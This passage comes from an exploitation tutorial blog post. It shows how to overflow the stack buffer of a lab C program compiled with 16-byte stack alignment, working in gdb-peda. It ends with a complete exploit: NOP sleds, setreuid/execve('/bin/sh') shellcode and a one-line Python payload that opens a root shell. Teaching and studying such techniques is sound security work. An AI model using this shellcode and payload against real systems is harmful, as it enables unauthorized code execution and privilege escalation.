  1. First, the lea instruction makes ECX pointing at the argc (ESP+4) argument of the main function. Then ECX-4 is pushed into the stack. ECX-4 is equal to ESP because ECX-4 = (ESP+4)-4 = ESP. This is how the return address is pushed into the stack.
  2. Next, after the already-familiar portion of the original prologue (push ebp; mov ebp,esp), ECX is pushed again into the stack to enable the leave instruction to restore its previous value in the end of the function implementation. It is also necessary to note that additional memory (0x84 bytes instead of 0x80) is allocated for the buffer this time in order to prevent conflicts with the new alignment.

The code section between the prologue and epilogue remains basically the same as in the first case. The only difference is that arguments of the main function are called based on an offset from the ECX register.

Speaking of the epilogue, only one new instruction has been added to it: restoration of the original ESP register value for successful return from the function using the ret instruction.

0x0804846b <+80>: leave                 ; mov esp,ebp; pop ebp
0x0804846c <+81>: lea    esp,[ecx-0x4]  ; restoring the original ESP value
0x0804846f <+84>: ret                   ; eip = esp

By the way, such a prologue is specific only for the principal main function. If the program had more functions, then the caller function (i.e. main) would have to align their stack frames, while the functions called by it would have classical prologues and epilogues.

The scheme showing the stack layout for the main function changes due to the additional ECX register value that must be saved somewhere.

Stack layout for the main overflow.c function aligned to a 16-byte boundary

Stack layout for the main overflow.c function aligned to a 16-byte boundary

Let's see how these changes affect the exploitation.

Practice

What happens if I try to examine a program compiled this way using the same methodology as I had used in the beginning of this article?

To be on the safe side, I generate a unique pattern 200 characters in length and try to find out the distance to EIP.

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 200-byte pattern to it

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 200-byte pattern to it

  • EIP points to a seemingly random address.
  • The offset value cannot be determined based on the ESP value (the unique pattern sent to the program as input does not include such a sequence of bytes).
  • It is possible to determine the offset of the saved EBP address.

gdb-peda$ pattern offset 0x41514141
1095844161 found at offset: 136

Because I have already analyzed the assembler code, everything should now fall into place: by sending a long enough string to the program as input, I overwrote all critical values in the stack.

First: ECX has been overwritten; as a result, the ESP register contains the value 0x6c41414c ('LAAl'), which is nothing more than 0x6c414150 - 4 where 0x6c414150 is the PAAl sequence present in the generated pattern starting from position 133. The lea esp,[ecx-0x4] instruction from the epilogue is responsible for this.

gdb-peda$ pattern offset 0x6c414150
1816215888 found at offset: 132

Second: ESP has been overwritten; as a result, EIP now points to a nonexistent value because ret tried to go to 0x6c414150 (marked by the blue frame). The instruction push DWORD PTR [ecx-0x4] from the prologue, where ecx-0x4 = (esp+0x4)-0x4 = 0x6c414150, is responsible for this.

Third: EBP has been overwritten; as a result, there is junk in its place; however, the offset to its saved value was calculated correctly.

Here is another example: I send a pattern 132 bytes in length, which is equal to the memory volume allocated for the buffer.

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 132-byte pattern to it

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 132-byte pattern to it

It seems to be a miracle: EIP has been successfully overflowed, and I can even calculate the offset.

gdb-peda$ pattern offset 0x48414132
1212236082 found at offset: 60

But the offset is equal to 60. How can it be that the return address is nearly in the middle of the memory area allocated for local variables? And why in the world has an overflow occurred if the length of the sent string is equal to the array size?

The situation is not crystal clear, but it still can be explained. The point is that when I send a pattern 132 bytes in length, I transmit, in fact, 133 bytes, not 132: the omnipresent null terminator marking the end of the string is added because the program is written in C. Therefore, the buf array has 'legitimately' taken 132 bytes, while the LSB byte of the ECX value has taken the null character, which reduced it by two orders (i.e. divided by 256). Accordingly, ESP (and therefore EIP) ended up 'inside' buf because its address has significantly decreased.

Nevertheless, I still can overwrite EIP and even execute my shellcode - but only in this particular case because the array size allows this. In other situations, this method won't work; so, I have no choice but to look for a more elegant exploitation technique.

All I have to do is 'capture' the value of the stack frame top prior to its destruction (i.e. prior to the execution of the leave instruction) to be able to restore the correct ESP value before it is aligned. To do so, I set a breakpoint at the address 0x0804846b (see the assembly code listing) and run the program with a diagnostic string 136 bytes in length consisting of junk characters (136 = buf + ecx = 132 + 4).

gdb-peda$ b *0x0804846b
gdb-peda$ r `python -c 'print "A"*136'`

Capturing the ESP value

Capturing the ESP value

I have got the required value: ESP: 0xbfffedc0. Now I simply increase it by 4 (thus, emulating the compiler's operations) and overwrite EIP with the 'dead code' using the following malicious string.

gdb-peda$ r `python -c 'print "\xd3\x4d\xc0\xd3"[::-1] + "A"*128 + "\xbf\xff\xed\xc4"[::-1]'`

Proof of Concept: EIP has been overwritten

Proof of Concept: EIP has been overwritten

My payload now has the following format: return_address + junk + ESP. The assembler code reduces the ESP value by 4, places it to the ECX register from where the original stack is restored, and its top points at the beginning of the 'junk' string: 0xd34dc0d3.

Therefore, I must inject the shellcode at the address containing the saved ESP register value. As you remember, there are two 32-byte NOP sleds 'wrapping' the payload, and I need to 'jump' exactly in the middle of the first NOPs sequence (0xbfffedd4 = 0xbfffedc4 + 16). So, the final version of the exploit is as follows.

ret_addr  = '\xbf\xff\xed\xd4'[::-1]
junk      = 'A' * 31
nop_sled  = '\x90' * 32
saved_esp = '\xbf\xff\xed\xc4'[::-1]

## setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
shellcode = '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

payload = ret_addr + nop_sled + shellcode + nop_sled + junk + saved_esp

In the form of a one-string Python script, it looks as shown below:

gdb-peda$ r `python -c 'print "\xbf\xff\xed\xd4"[::-1] + "\x90"*32 + "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*32 + "A"*31 + "\xbf\xff\xed\xc4"[::-1]'`

Final exploitation: getting shell and executing id

Final exploitation: getting shell and executing id

Victory! The game is over.


One Response to “The PWN realm. Modern techniques for stack overflow exploitation”

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>